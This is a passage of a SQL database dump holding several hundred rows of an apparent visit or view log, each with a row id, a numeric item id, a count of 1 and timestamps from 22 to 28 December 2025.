23:31:11'),(99893,3297,1,'2025-12-22','2025-12-22 23:40:29'),(99894,2411,1,'2025-12-22','2025-12-22 23:48:46'),(99895,4983,1,'2025-12-23','2025-12-23 00:13:48'),(99896,1722,1,'2025-12-23','2025-12-23 02:06:00'),(99897,3280,1,'2025-12-23','2025-12-23 02:34:42'),(99898,4960,1,'2025-12-23','2025-12-23 02:46:59'),(99899,5067,1,'2025-12-23','2025-12-23 03:32:12'),(99900,4950,1,'2025-12-23','2025-12-23 04:51:15'),(99901,4960,1,'2025-12-23','2025-12-23 05:01:06'),(99902,2297,1,'2025-12-23','2025-12-23 05:04:27'),(99903,5428,1,'2025-12-23','2025-12-23 05:30:34'),(99904,2993,1,'2025-12-23','2025-12-23 06:45:53'),(99905,1608,1,'2025-12-23','2025-12-23 10:17:37'),(99906,4950,1,'2025-12-23','2025-12-23 10:25:41'),(99907,4747,1,'2025-12-23','2025-12-23 10:33:32'),(99908,4950,1,'2025-12-23','2025-12-23 10:42:59'),(99909,4950,1,'2025-12-23','2025-12-23 10:43:00'),(99910,76,1,'2025-12-23','2025-12-23 10:44:50'),(99911,76,1,'2025-12-23','2025-12-23 10:45:05'),(99912,91,1,'2025-12-23','2025-12-23 11:36:39'),(99913,1606,1,'2025-12-23','2025-12-23 11:39:58'),(99914,2801,1,'2025-12-23','2025-12-23 11:43:34'),(99915,72,1,'2025-12-23','2025-12-23 11:48:52'),(99916,3257,1,'2025-12-23','2025-12-23 12:26:39'),(99917,5631,1,'2025-12-23','2025-12-23 12:35:59'),(99918,1590,1,'2025-12-23','2025-12-23 12:53:15'),(99919,3027,1,'2025-12-23','2025-12-23 13:12:16'),(99920,2804,1,'2025-12-23','2025-12-23 13:50:02'),(99921,4963,1,'2025-12-23','2025-12-23 14:02:41'),(99922,1718,1,'2025-12-23','2025-12-23 14:16:16'),(99923,4335,1,'2025-12-23','2025-12-23 15:15:25'),(99924,4335,1,'2025-12-23','2025-12-23 15:15:35'),(99925,3479,1,'2025-12-23','2025-12-23 15:20:47'),(99926,2457,1,'2025-12-23','2025-12-23 15:22:54'),(99927,4719,1,'2025-12-23','2025-12-23 15:25:36'),(99928,5567,1,'2025-12-23','2025-12-23 15:26:12'),(99929,5412,1,'2025-12-23','2025-12-23 15:36:47'),(99930,5146,1,'2025-12-23','2025-12-23 15:48:09'),(99931,110,1,'2025-12-23','2025-12-23 17:34:13'),(99932,3430,1,'2025-12-23','2025-12-23 17:46:18'),(99933,5502,1,'2025-12-23','2025-12-23 18:02:38'),(99934,1728,1,'2025-12-23','2025-12-23 18:21:06'),(99935,110,1,'2025-12-23','2025-12-23 18:27:14'),(99936,3069,1,'2025-12-23','2025-12-23 19:01:55'),(99937,2704,1,'2025-12-23','2025-12-23 19:17:51'),(99938,5515,1,'2025-12-23','2025-12-23 19:20:25'),(99939,110,1,'2025-12-23','2025-12-23 19:24:34'),(99940,110,1,'2025-12-23','2025-12-23 19:26:32'),(99941,3752,1,'2025-12-23','2025-12-23 19:44:03'),(99942,4966,1,'2025-12-23','2025-12-23 19:48:20'),(99943,2617,1,'2025-12-23','2025-12-23 20:04:00'),(99944,110,1,'2025-12-23','2025-12-23 20:08:36'),(99945,5457,1,'2025-12-23','2025-12-23 20:50:33'),(99946,3004,1,'2025-12-23','2025-12-23 21:08:02'),(99947,5067,1,'2025-12-23','2025-12-23 21:14:00'),(99948,5570,1,'2025-12-23','2025-12-23 21:29:38'),(99949,110,1,'2025-12-23','2025-12-23 21:32:39'),(99950,4950,1,'2025-12-23','2025-12-23 22:25:50'),(99951,3097,1,'2025-12-23','2025-12-23 22:27:41'),(99952,110,1,'2025-12-23','2025-12-23 22:29:05'),(99953,4950,1,'2025-12-23','2025-12-23 22:33:58'),(99954,110,1,'2025-12-23','2025-12-23 23:30:42'),(99955,5343,1,'2025-12-23','2025-12-23 23:39:10'),(99956,5425,1,'2025-12-23','2025-12-23 23:43:01'),(99957,4893,1,'2025-12-23','2025-12-23 23:52:15'),(99958,4756,1,'2025-12-23','2025-12-23 23:54:39'),(99959,110,1,'2025-12-24','2025-12-24 00:13:40'),(99960,3724,1,'2025-12-24','2025-12-24 00:23:04'),(99961,4944,1,'2025-12-24','2025-12-24 00:33:29'),(99962,472,1,'2025-12-24','2025-12-24 00:41:51'),(99963,4627,1,'2025-12-24','2025-12-24 00:47:28'),(99964,5578,1,'2025-12-24','2025-12-24 00:52:34'),(99965,5593,1,'2025-12-24','2025-12-24 01:13:38'),(99966,4400,1,'2025-12-24','2025-12-24 01:24:26'),(99967,110,1,'2025-12-24','2025-12-24 01:26:25'),(99968,3735,1,'2025-12-24','2025-12-24 01:45:39'),(99969,3735,1,'2025-12-24','2025-12-24 01:45:41'),(99970,3030,1,'2025-12-24','2025-12-24 02:03:34'),(99971,5512,1,'2025-12-24','2025-12-24 02:38:04'),(99972,5526,1,'2025-12-24','2025-12-24 02:41:00'),(99973,5489,1,'2025-12-24','2025-12-24 02:52:28'),(99974,5421,1,'2025-12-24','2025-12-24 02:52:31'),(99975,4988,1,'2025-12-24','2025-12-24 03:00:30'),(99976,3297,1,'2025-12-24','2025-12-24 03:09:00'),(99977,3005,1,'2025-12-24','2025-12-24 03:23:03'),(99978,2804,1,'2025-12-24','2025-12-24 03:30:29'),(99979,3479,1,'2025-12-24','2025-12-24 03:39:17'),(99980,5412,1,'2025-12-24','2025-12-24 03:44:46'),(99981,68,1,'2025-12-24','2025-12-24 04:05:17'),(99982,1703,1,'2025-12-24','2025-12-24 05:41:36'),(99983,3117,1,'2025-12-24','2025-12-24 06:20:38'),(99984,1602,1,'2025-12-24','2025-12-24 06:26:01'),(99985,5536,1,'2025-12-24','2025-12-24 06:49:13'),(99986,2503,1,'2025-12-24','2025-12-24 06:55:34'),(99987,1730,1,'2025-12-24','2025-12-24 07:01:45'),(99988,4448,1,'2025-12-24','2025-12-24 07:08:00'),(99989,2904,1,'2025-12-24','2025-12-24 07:12:47'),(99990,4335,1,'2025-12-24','2025-12-24 07:34:00'),(99991,5412,1,'2025-12-24','2025-12-24 07:39:17'),(99992,5146,1,'2025-12-24','2025-12-24 07:49:32'),(99993,5682,1,'2025-12-24','2025-12-24 08:39:20'),(99994,4719,1,'2025-12-24','2025-12-24 08:41:47'),(99995,3038,1,'2025-12-24','2025-12-24 08:43:14'),(99996,5561,1,'2025-12-24','2025-12-24 09:04:47'),(99997,1582,1,'2025-12-24','2025-12-24 09:16:02'),(99998,5441,1,'2025-12-24','2025-12-24 09:19:15'),(99999,5457,1,'2025-12-24','2025-12-24 09:33:00'),(100000,4944,1,'2025-12-24','2025-12-24 09:55:12'),(100001,1612,1,'2025-12-24','2025-12-24 09:55:35'),(100002,3083,1,'2025-12-24','2025-12-24 11:40:11'),(100003,91,1,'2025-12-24','2025-12-24 11:44:36'),(100004,1606,1,'2025-12-24','2025-12-24 11:45:16'),(100005,5461,1,'2025-12-24','2025-12-24 12:25:12'),(100006,3107,1,'2025-12-24','2025-12-24 13:01:02'),(100007,5639,1,'2025-12-24','2025-12-24 13:28:55'),(100008,474,1,'2025-12-24','2025-12-24 13:37:36'),(100009,2297,1,'2025-12-24','2025-12-24 13:51:23'),(100010,4980,1,'2025-12-24','2025-12-24 14:10:38'),(100011,5461,1,'2025-12-24','2025-12-24 15:06:05'),(100012,5067,1,'2025-12-24','2025-12-24 15:07:49'),(100013,4977,1,'2025-12-24','2025-12-24 15:11:09'),(100014,2457,1,'2025-12-24','2025-12-24 15:30:41'),(100015,2804,1,'2025-12-24','2025-12-24 15:33:57'),(100016,5420,1,'2025-12-24','2025-12-24 16:13:44'),(100017,2813,1,'2025-12-24','2025-12-24 16:16:02'),(100018,68,1,'2025-12-24','2025-12-24 16:45:53'),(100019,1598,1,'2025-12-24','2025-12-24 16:49:14'),(100020,3710,1,'2025-12-24','2025-12-24 17:02:21'),(100021,5461,1,'2025-12-24','2025-12-24 17:10:18'),(100022,5461,1,'2025-12-24','2025-12-24 17:13:16'),(100023,5356,1,'2025-12-24','2025-12-24 17:14:23'),(100024,3486,1,'2025-12-24','2025-12-24 17:16:24'),(100025,1697,1,'2025-12-24','2025-12-24 17:23:57'),(100026,3307,1,'2025-12-24','2025-12-24 18:00:16'),(100027,2956,1,'2025-12-24','2025-12-24 18:17:28'),(100028,5601,1,'2025-12-24','2025-12-24 18:21:41'),(100029,3056,1,'2025-12-24','2025-12-24 18:28:13'),(100030,110,1,'2025-12-24','2025-12-24 18:36:10'),(100031,3781,1,'2025-12-24','2025-12-24 18:45:19'),(100032,3479,1,'2025-12-24','2025-12-24 18:46:00'),(100033,1722,1,'2025-12-24','2025-12-24 18:51:19'),(100034,5412,1,'2025-12-24','2025-12-24 18:53:07'),(100035,5464,1,'2025-12-24','2025-12-24 18:53:30'),(100036,5397,1,'2025-12-24','2025-12-24 18:56:34'),(100037,4432,1,'2025-12-24','2025-12-24 19:10:10'),(100038,5433,1,'2025-12-24','2025-12-24 19:15:04'),(100039,5330,1,'2025-12-24','2025-12-24 19:34:31'),(100040,1614,1,'2025-12-24','2025-12-24 19:56:17'),(100041,5512,1,'2025-12-24','2025-12-24 20:48:04'),(100042,3263,1,'2025-12-24','2025-12-24 20:51:46'),(100043,5397,1,'2025-12-24','2025-12-24 21:01:25'),(100044,4911,1,'2025-12-24','2025-12-24 21:03:36'),(100045,5492,1,'2025-12-24','2025-12-24 21:11:12'),(100046,5323,1,'2025-12-24','2025-12-24 21:19:10'),(100047,4660,1,'2025-12-24','2025-12-24 21:19:50'),(100048,1614,1,'2025-12-24','2025-12-24 21:30:20'),(100049,5454,1,'2025-12-24','2025-12-24 22:27:42'),(100050,72,1,'2025-12-24','2025-12-24 22:47:57'),(100051,5264,1,'2025-12-24','2025-12-24 23:36:12'),(100052,5400,1,'2025-12-24','2025-12-24 23:53:33'),(100053,4529,1,'2025-12-25','2025-12-25 00:00:42'),(100054,4660,1,'2025-12-25','2025-12-25 00:10:59'),(100055,4960,1,'2025-12-25','2025-12-25 00:19:10'),(100056,3482,1,'2025-12-25','2025-12-25 00:56:46'),(100057,5507,1,'2025-12-25','2025-12-25 01:11:39'),(100058,5454,1,'2025-12-25','2025-12-25 01:26:39'),(100059,4944,1,'2025-12-25','2025-12-25 02:21:18'),(100060,4950,1,'2025-12-25','2025-12-25 02:47:00'),(100061,1728,1,'2025-12-25','2025-12-25 02:47:26'),(100062,2904,1,'2025-12-25','2025-12-25 03:06:54'),(100063,2804,1,'2025-12-25','2025-12-25 03:22:34'),(100064,4648,1,'2025-12-25','2025-12-25 03:46:41'),(100065,84,1,'2025-12-25','2025-12-25 03:58:46'),(100066,3263,1,'2025-12-25','2025-12-25 04:01:55'),(100067,3273,1,'2025-12-25','2025-12-25 04:10:21'),(100068,3267,1,'2025-12-25','2025-12-25 04:10:27'),(100069,1780,1,'2025-12-25','2025-12-25 04:13:55'),(100070,91,1,'2025-12-25','2025-12-25 04:17:30'),(100071,1768,1,'2025-12-25','2025-12-25 04:22:22'),(100072,1741,1,'2025-12-25','2025-12-25 05:01:52'),(100073,468,1,'2025-12-25','2025-12-25 05:04:32'),(100074,2609,1,'2025-12-25','2025-12-25 05:06:22'),(100075,1739,1,'2025-12-25','2025-12-25 05:09:47'),(100076,4944,1,'2025-12-25','2025-12-25 05:10:08'),(100077,1737,1,'2025-12-25','2025-12-25 05:17:37'),(100078,4722,1,'2025-12-25','2025-12-25 05:21:57'),(100079,2804,1,'2025-12-25','2025-12-25 05:41:19'),(100080,5412,1,'2025-12-25','2025-12-25 05:49:13'),(100081,1713,1,'2025-12-25','2025-12-25 06:07:24'),(100082,110,1,'2025-12-25','2025-12-25 07:24:32'),(100083,5598,1,'2025-12-25','2025-12-25 07:38:58'),(100084,5406,1,'2025-12-25','2025-12-25 07:49:01'),(100085,5397,1,'2025-12-25','2025-12-25 08:07:17'),(100086,5067,1,'2025-12-25','2025-12-25 08:30:41'),(100087,5428,1,'2025-12-25','2025-12-25 09:15:09'),(100088,3282,1,'2025-12-25','2025-12-25 09:24:57'),(100089,102,1,'2025-12-25','2025-12-25 09:36:31'),(100090,5457,1,'2025-12-25','2025-12-25 09:55:32'),(100091,1582,1,'2025-12-25','2025-12-25 09:58:15'),(100092,5310,1,'2025-12-25','2025-12-25 10:14:01'),(100093,5428,1,'2025-12-25','2025-12-25 11:00:29'),(100094,2252,1,'2025-12-25','2025-12-25 11:04:47'),(100095,89,1,'2025-12-25','2025-12-25 11:16:57'),(100096,5409,1,'2025-12-25','2025-12-25 11:41:47'),(100097,91,1,'2025-12-25','2025-12-25 11:47:07'),(100098,5125,1,'2025-12-25','2025-12-25 12:21:08'),(100099,3251,1,'2025-12-25','2025-12-25 13:31:01'),(100100,84,1,'2025-12-25','2025-12-25 14:27:31'),(100101,5567,1,'2025-12-25','2025-12-25 14:34:44'),(100102,3045,1,'2025-12-25','2025-12-25 15:12:01'),(100103,4950,1,'2025-12-25','2025-12-25 15:15:13'),(100104,68,1,'2025-12-25','2025-12-25 15:15:35'),(100105,5573,1,'2025-12-25','2025-12-25 15:24:31'),(100106,4830,1,'2025-12-25','2025-12-25 15:24:34'),(100107,72,1,'2025-12-25','2025-12-25 16:01:45'),(100108,5449,1,'2025-12-25','2025-12-25 16:01:58'),(100109,5436,1,'2025-12-25','2025-12-25 16:01:59'),(100110,72,1,'2025-12-25','2025-12-25 16:04:04'),(100111,4983,1,'2025-12-25','2025-12-25 16:30:22'),(100112,3664,1,'2025-12-25','2025-12-25 16:39:33'),(100113,2704,1,'2025-12-25','2025-12-25 16:39:51'),(100114,108,1,'2025-12-25','2025-12-25 16:39:57'),(100115,3051,1,'2025-12-25','2025-12-25 16:40:00'),(100116,1695,1,'2025-12-25','2025-12-25 16:51:40'),(100117,5585,1,'2025-12-25','2025-12-25 16:51:43'),(100118,5492,1,'2025-12-25','2025-12-25 17:17:31'),(100119,3714,1,'2025-12-25','2025-12-25 17:43:58'),(100120,4681,1,'2025-12-25','2025-12-25 17:48:24'),(100121,4712,1,'2025-12-25','2025-12-25 17:53:25'),(100122,4980,1,'2025-12-25','2025-12-25 17:54:29'),(100123,3781,1,'2025-12-25','2025-12-25 18:06:52'),(100124,5682,1,'2025-12-25','2025-12-25 18:26:37'),(100125,5682,1,'2025-12-25','2025-12-25 18:26:38'),(100126,5397,1,'2025-12-25','2025-12-25 18:28:36'),(100127,5515,1,'2025-12-25','2025-12-25 18:30:39'),(100128,3752,1,'2025-12-25','2025-12-25 18:34:49'),(100129,5253,1,'2025-12-25','2025-12-25 18:38:59'),(100130,3267,1,'2025-12-25','2025-12-25 18:42:06'),(100131,5415,1,'2025-12-25','2025-12-25 19:09:27'),(100132,5400,1,'2025-12-25','2025-12-25 19:14:59'),(100133,4529,1,'2025-12-25','2025-12-25 19:15:56'),(100134,3313,1,'2025-12-25','2025-12-25 19:19:14'),(100135,5346,1,'2025-12-25','2025-12-25 19:21:20'),(100136,5578,1,'2025-12-25','2025-12-25 19:36:16'),(100137,4400,1,'2025-12-25','2025-12-25 19:39:25'),(100138,5489,1,'2025-12-25','2025-12-25 19:46:36'),(100139,4722,1,'2025-12-25','2025-12-25 19:48:38'),(100140,5412,1,'2025-12-25','2025-12-25 19:49:39'),(100141,3117,1,'2025-12-25','2025-12-25 19:57:52'),(100142,2904,1,'2025-12-25','2025-12-25 20:00:58'),(100143,5561,1,'2025-12-25','2025-12-25 20:05:04'),(100144,5409,1,'2025-12-25','2025-12-25 20:05:05'),(100145,5441,1,'2025-12-25','2025-12-25 20:06:08'),(100146,3045,1,'2025-12-25','2025-12-25 20:14:20'),(100147,5363,1,'2025-12-25','2025-12-25 20:25:52'),(100148,3083,1,'2025-12-25','2025-12-25 20:30:41'),(100149,5449,1,'2025-12-25','2025-12-25 20:31:00'),(100150,5412,1,'2025-12-25','2025-12-25 20:31:48'),(100151,5420,1,'2025-12-25','2025-12-25 20:33:59'),(100152,1602,1,'2025-12-25','2025-12-25 20:40:52'),(100153,4983,1,'2025-12-25','2025-12-25 20:44:41'),(100154,3273,1,'2025-12-25','2025-12-25 20:48:29'),(100155,3486,1,'2025-12-25','2025-12-25 20:51:31'),(100156,5492,1,'2025-12-25','2025-12-25 20:56:44'),(100157,4681,1,'2025-12-25','2025-12-25 21:03:48'),(100158,72,1,'2025-12-25','2025-12-25 21:21:36'),(100159,4950,1,'2025-12-25','2025-12-25 21:31:54'),(100160,2419,1,'2025-12-25','2025-12-25 21:51:12'),(100161,2751,1,'2025-12-25','2025-12-25 21:58:51'),(100162,4977,1,'2025-12-25','2025-12-25 22:11:54'),(100163,2617,1,'2025-12-26','2025-12-26 01:27:34'),(100164,3673,1,'2025-12-26','2025-12-26 01:42:48'),(100165,3664,1,'2025-12-26','2025-12-26 03:18:12'),(100166,5605,1,'2025-12-26','2025-12-26 03:59:34'),(100167,4573,1,'2025-12-26','2025-12-26 04:31:49'),(100168,5343,1,'2025-12-26','2025-12-26 05:12:21'),(100169,3261,1,'2025-12-26','2025-12-26 05:27:30'),(100170,3087,1,'2025-12-26','2025-12-26 05:52:02'),(100171,4404,1,'2025-12-26','2025-12-26 07:07:47'),(100172,3675,1,'2025-12-26','2025-12-26 07:32:36'),(100173,108,1,'2025-12-26','2025-12-26 07:38:08'),(100174,5412,1,'2025-12-26','2025-12-26 07:51:22'),(100175,4440,1,'2025-12-26','2025-12-26 07:58:28'),(100176,3273,1,'2025-12-26','2025-12-26 08:02:43'),(100177,1602,1,'2025-12-26','2025-12-26 08:26:22'),(100178,3109,1,'2025-12-26','2025-12-26 08:54:16'),(100179,3781,1,'2025-12-26','2025-12-26 09:19:57'),(100180,3691,1,'2025-12-26','2025-12-26 10:25:41'),(100181,4420,1,'2025-12-26','2025-12-26 10:43:09'),(100182,91,1,'2025-12-26','2025-12-26 10:49:40'),(100183,5502,1,'2025-12-26','2025-12-26 11:00:54'),(100184,3045,1,'2025-12-26','2025-12-26 11:08:59'),(100185,5649,1,'2025-12-26','2025-12-26 11:38:13'),(100186,1544,1,'2025-12-26','2025-12-26 12:05:01'),(100187,4712,1,'2025-12-26','2025-12-26 12:12:01'),(100188,4950,1,'2025-12-26','2025-12-26 13:13:39'),(100189,467,1,'2025-12-26','2025-12-26 13:22:52'),(100190,68,1,'2025-12-26','2025-12-26 15:06:28'),(100191,1602,1,'2025-12-26','2025-12-26 15:24:58'),(100192,476,1,'2025-12-26','2025-12-26 15:33:14'),(100193,4950,1,'2025-12-26','2025-12-26 16:08:06'),(100194,80,1,'2025-12-26','2025-12-26 16:08:18'),(100195,3038,1,'2025-12-26','2025-12-26 16:37:12'),(100196,4639,1,'2025-12-26','2025-12-26 16:48:14'),(100197,5674,1,'2025-12-26','2025-12-26 16:48:19'),(100198,4950,1,'2025-12-26','2025-12-26 17:02:27'),(100199,5080,1,'2025-12-26','2025-12-26 17:13:33'),(100200,5449,1,'2025-12-26','2025-12-26 17:16:50'),(100201,483,1,'2025-12-26','2025-12-26 17:28:35'),(100202,1614,1,'2025-12-26','2025-12-26 17:34:21'),(100203,4944,1,'2025-12-26','2025-12-26 18:01:11'),(100204,5502,1,'2025-12-26','2025-12-26 18:09:34'),(100205,5409,1,'2025-12-26','2025-12-26 18:12:29'),(100206,3307,1,'2025-12-26','2025-12-26 18:27:46'),(100207,5412,1,'2025-12-26','2025-12-26 19:00:53'),(100208,3781,1,'2025-12-26','2025-12-26 19:04:06'),(100209,3273,1,'2025-12-26','2025-12-26 19:04:36'),(100210,3282,1,'2025-12-26','2025-12-26 19:06:20'),(100211,2457,1,'2025-12-26','2025-12-26 19:21:01'),(100212,1715,1,'2025-12-26','2025-12-26 19:23:17'),(100213,3069,1,'2025-12-26','2025-12-26 19:26:27'),(100214,5522,1,'2025-12-26','2025-12-26 19:36:54'),(100215,5433,1,'2025-12-26','2025-12-26 20:02:51'),(100216,1588,1,'2025-12-26','2025-12-26 20:17:28'),(100217,3253,1,'2025-12-26','2025-12-26 20:21:17'),(100218,4741,1,'2025-12-26','2025-12-26 20:29:42'),(100219,1602,1,'2025-12-26','2025-12-26 20:50:15'),(100220,2748,1,'2025-12-26','2025-12-26 20:57:18'),(100221,2993,1,'2025-12-26','2025-12-26 21:30:49'),(100222,4950,1,'2025-12-26','2025-12-26 21:49:23'),(100223,5512,1,'2025-12-26','2025-12-26 22:05:40'),(100224,5457,1,'2025-12-26','2025-12-26 22:07:40'),(100225,4950,1,'2025-12-26','2025-12-26 22:55:03'),(100226,68,1,'2025-12-26','2025-12-26 22:56:55'),(100227,80,1,'2025-12-26','2025-12-26 22:57:18'),(100228,4950,1,'2025-12-26','2025-12-26 22:57:55'),(100229,4660,1,'2025-12-26','2025-12-26 22:59:30'),(100230,5492,1,'2025-12-26','2025-12-26 23:12:41'),(100231,5433,1,'2025-12-26','2025-12-26 23:12:41'),(100232,5666,1,'2025-12-26','2025-12-26 23:28:45'),(100233,5570,1,'2025-12-26','2025-12-26 23:44:32'),(100234,5454,1,'2025-12-27','2025-12-27 00:15:02'),(100235,4862,1,'2025-12-27','2025-12-27 00:19:36'),(100236,2558,1,'2025-12-27','2025-12-27 00:28:52'),(100237,2769,1,'2025-12-27','2025-12-27 01:18:46'),(100238,5449,1,'2025-12-27','2025-12-27 01:32:18'),(100239,5334,1,'2025-12-27','2025-12-27 01:56:12'),(100240,5146,1,'2025-12-27','2025-12-27 02:22:11'),(100241,5425,1,'2025-12-27','2025-12-27 02:26:14'),(100242,4703,1,'2025-12-27','2025-12-27 02:42:15'),(100243,5639,1,'2025-12-27','2025-12-27 02:46:51'),(100244,5412,1,'2025-12-27','2025-12-27 02:57:53'),(100245,3273,1,'2025-12-27','2025-12-27 03:09:22'),(100246,72,1,'2025-12-27','2025-12-27 03:11:59'),(100247,4950,1,'2025-12-27','2025-12-27 04:26:10'),(100248,5441,1,'2025-12-27','2025-12-27 04:42:29'),(100249,4950,1,'2025-12-27','2025-12-27 04:56:48'),(100250,4960,1,'2025-12-27','2025-12-27 05:02:19'),(100251,4608,1,'2025-12-27','2025-12-27 05:06:19'),(100252,5397,1,'2025-12-27','2025-12-27 05:15:11'),(100253,5062,1,'2025-12-27','2025-12-27 05:22:50'),(100254,5461,1,'2025-12-27','2025-12-27 05:56:59'),(100255,3714,1,'2025-12-27','2025-12-27 07:32:23'),(100256,108,1,'2025-12-27','2025-12-27 07:40:06'),(100257,2457,1,'2025-12-27','2025-12-27 07:45:18'),(100258,5420,1,'2025-12-27','2025-12-27 08:30:12'),(100259,4950,1,'2025-12-27','2025-12-27 09:01:59'),(100260,5406,1,'2025-12-27','2025-12-27 09:26:20'),(100261,5662,1,'2025-12-27','2025-12-27 09:30:38'),(100262,1602,1,'2025-12-27','2025-12-27 09:48:17'),(100263,4738,1,'2025-12-27','2025-12-27 09:56:16'),(100264,2813,1,'2025-12-27','2025-12-27 10:09:59'),(100265,3058,1,'2025-12-27','2025-12-27 10:16:39'),(100266,1608,1,'2025-12-27','2025-12-27 10:17:09'),(100267,3180,1,'2025-12-27','2025-12-27 10:17:30'),(100268,5643,1,'2025-12-27','2025-12-27 10:37:11'),(100269,91,1,'2025-12-27','2025-12-27 10:53:08'),(100270,4520,1,'2025-12-27','2025-12-27 11:21:03'),(100271,3079,1,'2025-12-27','2025-12-27 11:30:50'),(100272,2775,1,'2025-12-27','2025-12-27 11:35:53'),(100273,1877,1,'2025-12-27','2025-12-27 11:41:49'),(100274,5428,1,'2025-12-27','2025-12-27 11:57:48'),(100275,3038,1,'2025-12-27','2025-12-27 12:13:09'),(100276,1726,1,'2025-12-27','2025-12-27 12:15:38'),(100277,5125,1,'2025-12-27','2025-12-27 12:58:14'),(100278,1715,1,'2025-12-27','2025-12-27 13:30:42'),(100279,3038,1,'2025-12-27','2025-12-27 13:47:31'),(100280,3004,1,'2025-12-27','2025-12-27 14:05:10'),(100281,4963,1,'2025-12-27','2025-12-27 14:06:10'),(100282,1602,1,'2025-12-27','2025-12-27 14:45:33'),(100283,5567,1,'2025-12-27','2025-12-27 14:50:01'),(100284,5420,1,'2025-12-27','2025-12-27 15:02:43'),(100285,4977,1,'2025-12-27','2025-12-27 16:56:12'),(100286,5561,1,'2025-12-27','2025-12-27 16:59:47'),(100287,5428,1,'2025-12-27','2025-12-27 17:05:15'),(100288,5400,1,'2025-12-27','2025-12-27 17:16:29'),(100289,1872,1,'2025-12-27','2025-12-27 17:45:02'),(100290,4950,1,'2025-12-27','2025-12-27 17:53:50'),(100291,4950,1,'2025-12-27','2025-12-27 17:58:54'),(100292,4712,1,'2025-12-27','2025-12-27 18:09:29'),(100293,5436,1,'2025-12-27','2025-12-27 18:10:11'),(100294,3307,1,'2025-12-27','2025-12-27 18:25:32'),(100295,72,1,'2025-12-27','2025-12-27 18:35:51'),(100296,4400,1,'2025-12-27','2025-12-27 18:59:49'),(100297,2704,1,'2025-12-27','2025-12-27 19:18:00'),(100298,1701,1,'2025-12-27','2025-12-27 19:19:59'),(100299,4275,1,'2025-12-27','2025-12-27 19:25:22'),(100300,5406,1,'2025-12-27','2025-12-27 19:33:20'),(100301,4950,1,'2025-12-27','2025-12-27 19:41:28'),(100302,4966,1,'2025-12-27','2025-12-27 19:48:20'),(100303,5128,1,'2025-12-27','2025-12-27 19:55:48'),(100304,3781,1,'2025-12-27','2025-12-27 19:58:57'),(100305,5489,1,'2025-12-27','2025-12-27 20:05:19'),(100306,5317,1,'2025-12-27','2025-12-27 20:14:38'),(100307,472,1,'2025-12-27','2025-12-27 20:17:39'),(100308,2964,1,'2025-12-27','2025-12-27 20:24:41'),(100309,3273,1,'2025-12-27','2025-12-27 21:05:47'),(100310,5515,1,'2025-12-27','2025-12-27 21:24:19'),(100311,2993,1,'2025-12-27','2025-12-27 21:28:57'),(100312,5662,1,'2025-12-27','2025-12-27 21:28:59'),(100313,5054,1,'2025-12-27','2025-12-27 21:48:49'),(100314,5433,1,'2025-12-27','2025-12-27 21:57:06'),(100315,3752,1,'2025-12-27','2025-12-27 22:12:37'),(100316,3781,1,'2025-12-27','2025-12-27 22:44:03'),(100317,5054,1,'2025-12-27','2025-12-27 23:01:36'),(100318,5461,1,'2025-12-27','2025-12-27 23:09:19'),(100319,4420,1,'2025-12-27','2025-12-27 23:25:45'),(100320,4420,1,'2025-12-27','2025-12-27 23:31:27'),(100321,4878,1,'2025-12-27','2025-12-27 23:48:13'),(100322,2503,1,'2025-12-28','2025-12-28 00:06:10'),(100323,3072,1,'2025-12-28','2025-12-28 00:37:25'),(100324,4420,1,'2025-12-28','2025-12-28 01:04:06'),(100325,3710,1,'2025-12-28','2025-12-28 01:14:27'),(100326,5512,1,'2025-12-28','2025-12-28 01:17:58'),(100327,1612,1,'2025-12-28','2025-12-28 01:31:17'),(100328,5609,1,'2025-12-28','2025-12-28 01:42:58'),(100329,1600,1,'2025-12-28','2025-12-28 01:59:39'),(100330,5259,1,'2025-12-28','2025-12-28 02:03:10'),(100331,4870,1,'2025-12-28','2025-12-28 02:04:41'),(100332,4556,1,'2025-12-28','2025-12-28 02:25:22'),(100333,110,1,'2025-12-28','2025-12-28 03:11:15'),(100334,4802,1,'2025-12-28','2025-12-28 03:33:08'),(100335,5464,1,'2025-12-28','2025-12-28 04:03:41'),(100336,4712,1,'2025-12-28','2025-12-28 04:22:14'),(100337,5626,1,'2025-12-28','2025-12-28 04:31:48'),(100338,5454,1,'2025-12-28','2025-12-28 04:39:02'),(100339,4858,1,'2025-12-28','2025-12-28 04:48:26'),(100340,472,1,'2025-12-28','2025-12-28 05:04:04'),(100341,4412,1,'2025-12-28','2025-12-28 05:13:09'),(100342,4387,1,'2025-12-28','2025-12-28 05:31:41'),(100343,4870,1,'2025-12-28','2025-12-28 05:37:18'),(100344,3269,1,'2025-12-28','2025-12-28 05:38:07'),(100345,4332,1,'2025-12-28','2025-12-28 05:41:01'),(100346,4897,1,'2025-12-28','2025-12-28 05:49:15'),(100347,4797,1,'2025-12-28','2025-12-28 06:03:06'),(100348,5163,1,'2025-12-28','2025-12-28 06:18:35'),(100349,5428,1,'2025-12-28','2025-12-28 06:25:43'),(100350,3257,1,'2025-12-28','2025-12-28 06:31:15'),(100351,91,1,'2025-12-28','2025-12-28 06:56:54'),(100352,4556,1,'2025-12-28','2025-12-28 06:58:07'),(100353,3240,1,'2025-12-28','2025-12-28 07:04:26'),(100354,68,1,'2025-12-28','2025-12-28 07:21:48'),(100355,3674,1,'2025-12-28','2025-12-28 07:26:40'),(100356,4591,1,'2025-12-28','2025-12-28 07:28:07'),(100357,1705,1,'2025-12-28','2025-12-28 08:19:26'),(100358,1703,1,'2025-12-28','2025-12-28 08:25:58'),(100359,4768,1,'2025-12-28','2025-12-28 08:33:14'),(100360,3261,1,'2025-12-28','2025-12-28 08:34:11'),(100361,1582,1,'2025-12-28','2025-12-28 08:59:38'),(100362,3247,1,'2025-12-28','2025-12-28 09:01:14'),(100363,4238,1,'2025-12-28','2025-12-28 09:03:11'),(100364,4944,1,'2025-12-28','2025-12-28 09:14:10'),(100365,3752,1,'2025-12-28','2025-12-28 09:18:55'),(100366,5578,1,'2025-12-28','2025-12-28 09:54:21'),(100367,5657,1,'2025-12-28','2025-12-28 09:57:08'),(100368,5397,1,'2025-12-28','2025-12-28 10:03:01'),(100369,5371,1,'2025-12-28','2025-12-28 10:34:40'),(100370,4400,1,'2025-12-28','2025-12-28 10:46:20'),(100371,3261,1,'2025-12-28','2025-12-28 10:50:24'),(100372,1776,1,'2025-12-28','2025-12-28 10:59:16'),(100373,4566,1,'2025-12-28','2025-12-28 11:01:54'),(100374,5626,1,'2025-12-28','2025-12-28 11:12:09'),(100375,3079,1,'2025-12-28','2025-12-28 11:13:17'),(100376,4674,1,'2025-12-28','2025-12-28 11:14:44'),(100377,3287,1,'2025-12-28','2025-12-28 